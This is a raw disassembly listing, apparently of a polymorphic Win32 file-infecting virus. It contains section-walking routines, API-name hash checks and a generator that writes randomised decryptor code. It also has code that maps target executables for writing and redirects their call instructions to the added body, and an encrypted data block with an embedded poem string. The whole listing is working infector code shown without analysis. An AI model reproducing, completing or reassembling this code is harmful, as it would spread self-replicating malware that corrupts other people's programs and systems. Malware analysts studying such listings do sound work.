dd 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h, 95FF53h
dd 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h
dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h
dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0C784040Ah
dd 0A6141330h, 0D479ED10h, 0B7AB44Fh, 0A6142905h, 0B1FAE510h
dd 401CEA27h, 858B9957h, 9ADB6EDBh, 73C17E1Ch, 99AD471Ah
dd 37524862h, 0AB595740h, 4522DF3Ah, 0F61F7535h, 6EF96A2Fh
dd 0AF69DF60h, 6CCC5C53h, 0B8B352C2h, 0D8h, 0Ch dup(0)
db 0
; =============== S U B R O U T I N E =======================================
sub_31433F59 proc near ; CODE XREF: sub_31433FA0:loc_31433FFD�p
; sub_31434060+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_31433F75: ; CODE XREF: sub_31433F59+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_31433F97
cmp eax, [edx+8]
jnb short loc_31433F97
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_31433F9C
; ---------------------------------------------------------------------------
loc_31433F97: ; CODE XREF: sub_31433F59+23�j
; sub_31433F59+28�j
add edx, 28h
loop loc_31433F75
loc_31433F9C: ; CODE XREF: sub_31433F59+3C�j
popa
retn 4
sub_31433F59 endp
; =============== S U B R O U T I N E =======================================
sub_31433FA0 proc near ; CODE XREF: UPX2:314342CC�p
; UPX2:314342F2�p
mov [ebp+4022F7h], al
call sub_3143400F
push 1Fh
lea eax, [ebp+402224h]
pop ecx
loc_31433FB7: ; CODE XREF: sub_31433FA0+1E�j
cmp [eax], ebx
jz short loc_31433FC7
add eax, 4
loop loc_31433FB7
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_31433FC7: ; CODE XREF: sub_31433FA0+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_31433FE1
loc_31433FD1: ; CODE XREF: sub_31433FA0+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_31433FD1
mov [ebp+402224h], ebx
loc_31433FE1: ; CODE XREF: sub_31433FA0+2F�j
; sub_3143400F+34�j
cmp dword ptr [edx], 0
jz short loc_31433FEB
sub esi, [edx]
add esi, [edx+10h]
loc_31433FEB: ; CODE XREF: sub_31433FA0+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_31433FFA
push dword ptr [edx]
jmp short loc_31433FFD
; ---------------------------------------------------------------------------
loc_31433FFA: ; CODE XREF: sub_31433FA0+54�j
push dword ptr [edx+10h]
loc_31433FFD: ; CODE XREF: sub_31433FA0+58�j
call sub_31433F59
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_31433FA0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3143400F proc near ; CODE XREF: sub_31433FA0+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_31434060
mov eax, [ebp+40398Eh]
call sub_314337A4
call sub_3143404C
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_31434045
mov [ebp+4022A0h], ebx
jmp short loc_31433FE1
; ---------------------------------------------------------------------------
loc_31434045: ; CODE XREF: sub_3143400F+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3143400F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3143404C proc near ; CODE XREF: sub_3143400F+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_31434060
xor ecx, ecx
retn
sub_3143404C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31434060 proc near ; CODE XREF: sub_3143400F+10�p
; sub_3143404C+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_31433F59
add edx, [ebp+4039AAh]
add edx, esi
loc_31434074: ; CODE XREF: sub_31434060+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_31434185
cmp dword ptr [edx+10h], 0
jz locret_31434185
mov eax, [edx+0Ch]
push eax
call sub_31433F59
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3143409A: ; CODE XREF: sub_31434060+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_314340BA
cmp cl, 2Eh
jz short loc_314340A9
loc_314340A6: ; CODE XREF: sub_31434060+58�j
inc eax
jmp short loc_3143409A
; ---------------------------------------------------------------------------
loc_314340A9: ; CODE XREF: sub_31434060+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_314340A6
loc_314340BA: ; CODE XREF: sub_31434060+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3143417D
cmp word ptr [eax-2], 3233h
jnz loc_3143417D
push esi
cmp dword ptr [edx], 0
jnz short loc_314340DD
mov ecx, [edx+10h]
jmp short loc_314340DF
; ---------------------------------------------------------------------------
loc_314340DD: ; CODE XREF: sub_31434060+76�j
mov ecx, [edx]
loc_314340DF: ; CODE XREF: sub_31434060+7B�j
add esi, ecx
push ecx
call sub_31433F59
add esi, [ebp+4039AAh]
loc_314340ED: ; CODE XREF: sub_31434060+90�j
; sub_31434060+117�j
lodsd
test eax, eax
js short loc_314340ED
jz loc_3143417C
push dword ptr [ebp+4039AAh]
push eax
call sub_31433F59
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_31434119: ; CODE XREF: sub_31434060+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_31434130
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_31434119
; ---------------------------------------------------------------------------
loc_31434130: ; CODE XREF: sub_31434060+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_31434176
cmp ebx, 0DB6E45A8h
jz short loc_31434176
cmp ebx, 0FFA13B59h
jz short loc_31434176
cmp ebx, 0ACB522D6h
jz short loc_31434176
cmp ebx, 0F358E993h
jz short loc_31434176
cmp ebx, 0F358E97Dh
jz short loc_31434176
cmp ebx, 0E1253F46h
jz short loc_31434176
cmp ebx, 0E1253F30h
jz short loc_31434176
call dword ptr [ebp+403992h]
loc_31434176: ; CODE XREF: sub_31434060+D6�j
; sub_31434060+DE�j ...
pop ebx
jmp loc_314340ED
; ---------------------------------------------------------------------------
loc_3143417C: ; CODE XREF: sub_31434060+92�j
pop esi
loc_3143417D: ; CODE XREF: sub_31434060+60�j
; sub_31434060+6C�j
add edx, 14h
jmp loc_31434074
; ---------------------------------------------------------------------------
locret_31434185: ; CODE XREF: sub_31434060+18�j
; sub_31434060+22�j
retn
sub_31434060 endp
; ---------------------------------------------------------------------------
db 3
; =============== S U B R O U T I N E =======================================
sub_31434187 proc near ; CODE XREF: UPX2:314342C5�p
; UPX2:314342EB�p
push 4
pop eax
call sub_314337A4
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_314337A4
add edx, 8
xchg edx, ecx
loc_314341AF: ; CODE XREF: sub_31434187:loc_314341EE�j
push 5
pop eax
call sub_314337A4
cmp dl, 3
jnb short loc_314341C7
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_314341EE
; ---------------------------------------------------------------------------
loc_314341C7: ; CODE XREF: sub_31434187+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_314341E8
mov al, 11h
call sub_314337A4
mov eax, 1
loc_314341DC: ; CODE XREF: sub_31434187+5D�j
test dl, dl
jz short loc_314341ED
shl eax, 1
dec dl
jmp short loc_314341DC
; ---------------------------------------------------------------------------
jmp short loc_314341ED
; ---------------------------------------------------------------------------
loc_314341E8: ; CODE XREF: sub_31434187+47�j
mov eax, 80000000h
loc_314341ED: ; CODE XREF: sub_31434187+57�j
; sub_31434187+5F�j
stosd
loc_314341EE: ; CODE XREF: sub_31434187+3E�j
loop loc_314341AF
retn
sub_31434187 endp
; ---------------------------------------------------------------------------
loc_314341F1: ; CODE XREF: sub_31434C4B+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_31434206
mov al, 60h
stosb
loc_31434206: ; CODE XREF: UPX2:31434201�j
test dword ptr [ebp+403431h], 1000003h
jz loc_3143430C
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EECCEDCAh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_31434284
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_3143424F
mov eax, 2E8B6467h
loc_3143424F: ; CODE XREF: UPX2:31434248�j
stosd
mov ax, 0
stosw
jz short loc_3143425B
mov al, 5Dh
stosb
loc_3143425B: ; CODE XREF: UPX2:31434256�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_31434282
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_31434282
mov eax, 0F8ED83h
loc_31434282: ; CODE XREF: UPX2:3143426A�j
; UPX2:3143427B�j
stosd
dec edi
loc_31434284: ; CODE XREF: UPX2:31434237�j
test dword ptr [ebp+403431h], 3
jz short loc_31434294
mov al, 0E9h
stosb
stosd
loc_31434294: ; CODE XREF: UPX2:3143428E�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_3143430C
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_31434187
mov al, 20h
call sub_31433FA0
jecxz short loc_3143430C
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_314342FF
call sub_31434187
mov al, 1Fh
call sub_31433FA0
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_314342FF: ; CODE XREF: UPX2:314342E9�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_3143430C: ; CODE XREF: UPX2:31434210�j
; UPX2:314342AB�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3143432A
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3143432A: ; CODE XREF: UPX2:31434316�j
test dword ptr [ebp+403431h], 8
jnz short loc_31434380
cmp byte ptr [ebp+40342Fh], 0
jz short loc_31434380
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_3143437E
mov al, 49h
stosb
mov ax, 0FC75h
loc_3143437E: ; CODE XREF: UPX2:31434375�j
stosw
loc_31434380: ; CODE XREF: UPX2:31434334�j
; UPX2:3143433D�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_314343A1
mov al, 58h
or al, [ebp+403429h]
stosb
loc_314343A1: ; CODE XREF: UPX2:31434396�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_314343B4
add ah, 28h
loc_314343B4: ; CODE XREF: UPX2:314343AF�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_314343D8
mov al, 50h
add al, [ebp+403429h]
stosb
loc_314343D8: ; CODE XREF: UPX2:314343CD�j
test dword ptr [ebp+403431h], 80h
jnz short loc_314343EF
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_3143442C
; ---------------------------------------------------------------------------
loc_314343EF: ; CODE XREF: UPX2:314343E2�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_31434401
mov al, 29h
loc_31434401: ; CODE XREF: UPX2:314343FD�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_31434424
mov ah, 0C8h
loc_31434424: ; CODE XREF: UPX2:31434420�j
or ah, [ebp+40342Ah]
stosw
loc_3143442C: ; CODE XREF: UPX2:314343ED�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_314344B0
test dword ptr [ebp+403431h], 400h
jnz short loc_3143445B
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_314344A8
; ---------------------------------------------------------------------------
loc_3143445B: ; CODE XREF: UPX2:3143444E�j
test dword ptr [ebp+403431h], 800h
jnz short loc_31434478
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_3143448D
; ---------------------------------------------------------------------------
loc_31434478: ; CODE XREF: UPX2:31434465�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_3143448D: ; CODE XREF: UPX2:31434476�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_314344A0
add ah, 8
loc_314344A0: ; CODE XREF: UPX2:3143449B�j
or ah, [ebp+40342Bh]
stosw
loc_314344A8: ; CODE XREF: UPX2:31434459�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_314344B0: ; CODE XREF: UPX2:31434442�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_314344C5
mov al, 50h
add al, [ebp+403429h]
stosb
loc_314344C5: ; CODE XREF: UPX2:314344BA�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_314344D5
add al, 4
loc_314344D5: ; CODE XREF: UPX2:314344D1�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_314344F2
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_314344F2: ; CODE XREF: UPX2:314344E9�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_31434504
mov ah, 29h
loc_31434504: ; CODE XREF: UPX2:31434500�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_31434522
mov al, 86h
loc_31434522: ; CODE XREF: UPX2:3143451E�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_31434536
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31434536: ; CODE XREF: UPX2:3143452D�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_3143454D
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_3143455C
; ---------------------------------------------------------------------------
loc_3143454D: ; CODE XREF: UPX2:31434540�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_3143455C: ; CODE XREF: UPX2:3143454B�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_31434597
test dword ptr [ebp+403431h], 40000h
jnz short loc_3143458E
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31434596
; ---------------------------------------------------------------------------
loc_3143458E: ; CODE XREF: UPX2:31434572�j
mov al, 40h
or al, [ebp+40342Bh]
loc_31434596: ; CODE XREF: UPX2:3143458C�j
stosb
loc_31434597: ; CODE XREF: UPX2:31434566�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_314345B3
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_314345BB
; ---------------------------------------------------------------------------
loc_314345B3: ; CODE XREF: UPX2:314345A1�j
mov al, 48h
or al, [ebp+40342Ah]
loc_314345BB: ; CODE XREF: UPX2:314345B1�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_314345EF
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_3143460A
mov cl, 77h
jmp short loc_3143460A
; ---------------------------------------------------------------------------
loc_314345EF: ; CODE XREF: UPX2:314345C8�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_3143460A: ; CODE XREF: UPX2:314345E9�j
; UPX2:314345ED�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_314346B4
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3143464B
mov eax, 2E876467h
loc_3143464B: ; CODE XREF: UPX2:31434644�j
stosd
mov eax, 0
stosw
jnz short loc_3143465B
mov ax, 0E58Bh
stosw
loc_3143465B: ; CODE XREF: UPX2:31434653�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_314346B1
test dword ptr [ebp+403431h], 8000000h
jz short loc_314346A3
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_3143469E
mov ax, 424h
stosw
jmp short loc_314346B1
; ---------------------------------------------------------------------------
loc_3143469E: ; CODE XREF: UPX2:31434694�j
mov al, 8
stosb
jmp short loc_314346B1
; ---------------------------------------------------------------------------
loc_314346A3: ; CODE XREF: UPX2:3143467B�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_314346B4
; ---------------------------------------------------------------------------
loc_314346B1: ; CODE XREF: UPX2:3143466F�j
; UPX2:3143469C�j ...
mov al, 0C9h
stosb
loc_314346B4: ; CODE XREF: UPX2:31434627�j
; UPX2:314346AF�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_314346E0
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_314346E0: ; CODE XREF: UPX2:314346BE�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_3143474B
test dword ptr [ebp+403431h], 20000000h
jz short loc_31434711
loc_31434704: ; CODE XREF: UPX2:3143470F�j
test edi, 3
jz short loc_31434711
mov al, 90h
stosb
jmp short loc_31434704
; ---------------------------------------------------------------------------
loc_31434711: ; CODE XREF: UPX2:31434702�j
; UPX2:3143470A�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_3143473F
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_31434749
; ---------------------------------------------------------------------------
loc_3143473F: ; CODE XREF: UPX2:31434731�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_31434749: ; CODE XREF: UPX2:3143473D�j
stosw
loc_3143474B: ; CODE XREF: UPX2:314346F6�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_314347CA
test dword ptr [ebp+403431h], 20000000h
jz short loc_31434770
loc_31434763: ; CODE XREF: UPX2:3143476E�j
test edi, 3
jz short loc_31434770
mov al, 90h
stosb
jmp short loc_31434763
; ---------------------------------------------------------------------------
loc_31434770: ; CODE XREF: UPX2:31434761�j
; UPX2:31434769�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_31434799
lea eax, [ebp+403429h]
loc_31434791: ; CODE XREF: UPX2:31434797�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31434791
loc_31434799: ; CODE XREF: UPX2:31434789�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_314347AE
mov ax, 0C031h
stosw
loc_314347AE: ; CODE XREF: UPX2:314347A6�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_314347C7
mov ax, 0C031h
stosw
loc_314347C7: ; CODE XREF: UPX2:314347BF�j
mov al, 0C3h
stosb
loc_314347CA: ; CODE XREF: UPX2:31434755�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_314347E2
push edi
sub edi, eax
pop eax
jmp short loc_314347FB
; ---------------------------------------------------------------------------
loc_314347E2: ; CODE XREF: UPX2:314347DA�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_314347FB: ; CODE XREF: UPX2:314347E0�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_3143481B
neg eax
loc_3143481B: ; CODE XREF: UPX2:31434817�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3143481F proc near ; CODE XREF: sub_31434C4B+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_31434A07
call near ptr loc_3143483F+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3143483F: ; CODE XREF: sub_3143481F+F�p
add bh, bh
sub_3143481F endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_31433F59
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_31433F59
mov edi, [ebp+4039A6h]
push esi
call sub_31433F59
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_31434A07
jz loc_31434A07
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_314349D8
loc_314348B9: ; CODE XREF: sub_314349D8+29�j
lodsb
cmp al, 0E8h
jnz loc_31434964
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_31433F59
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_314348E7
cmp eax, [edi+0Ch]
jnb loc_31434A00
jmp short loc_314348F3
; ---------------------------------------------------------------------------
loc_314348E7: ; CODE XREF: sub_314349D8-FE�j
cmp [ebp+4039A6h], edx
jnz loc_31434A00
loc_314348F3: ; CODE XREF: sub_314349D8-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_31434A00
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_31433F59
cmp [ebp+4039A6h], edi
jnz loc_31434A00
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_31434A00
cmp eax, [edi+8]
jnb loc_31434A00
loc_3143493C: ; CODE XREF: sub_314349D8+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_31434A16
jmp loc_31434A00
; ---------------------------------------------------------------------------
loc_31434964: ; CODE XREF: sub_314349D8-11C�j
cmp al, 0FFh
jnz loc_31434A00
cmp byte ptr [esi], 15h
jnz loc_31434A00
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_31433F59
cmp [ebp+4039A6h], edi
jnz short loc_31434A00
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_314349AD
cmp eax, [ebp+4039C6h]
jb short loc_31434A16
loc_314349AD: ; CODE XREF: sub_314349D8-35�j
cmp eax, 70000000h
jb short loc_314349EB
call sub_314349D8
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_314349D7
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_314349F2
; ---------------------------------------------------------------------------
locret_314349D7: ; CODE XREF: sub_314349D8-F�j
retn
; END OF FUNCTION CHUNK FOR sub_314349D8
; =============== S U B R O U T I N E =======================================
sub_314349D8 proc near ; CODE XREF: sub_314349D8-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 314348B9 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_31434060
popa
loc_314349EB: ; CODE XREF: sub_314349D8-26�j
test eax, 80000000h
jnz short loc_31434A00
loc_314349F2: ; CODE XREF: sub_314349D8-3�j
sub eax, [edi+0Ch]
jb short loc_31434A00
cmp eax, [edi+8]
jb loc_3143493C
loc_31434A00: ; CODE XREF: sub_314349D8-F9�j
; sub_314349D8-EB�j ...
dec ecx
jnz loc_314348B9
loc_31434A07: ; CODE XREF: sub_3143481F+9�j
; UPX2:314348A1�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_31434A52
; ---------------------------------------------------------------------------
loc_31434A16: ; CODE XREF: sub_314349D8-7F�j
; sub_314349D8-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_31434A52: ; CODE XREF: sub_314349D8+3C�j
pop edi
pop esi
retn
sub_314349D8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31434A55 proc near ; CODE XREF: UPX2:31434C23�p
; sub_31434C4B+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_31434B26
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_31434B26
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_31434FDE
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_31434FD2
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_31434FD2
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_31434FD2
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_31434FAA
mov [ebp+403972h], eax
locret_31434B26: ; CODE XREF: sub_31434A55+10�j
; sub_31434A55+27�j ...
retn
sub_31434A55 endp
; =============== S U B R O U T I N E =======================================
sub_31434B27 proc near ; CODE XREF: sub_31434C4B+117�p
; sub_31434C4B+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31434B41
add eax, [ebp+40106Dh]
loc_31434B41: ; CODE XREF: sub_31434B27+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_31434B27 endp
; =============== S U B R O U T I N E =======================================
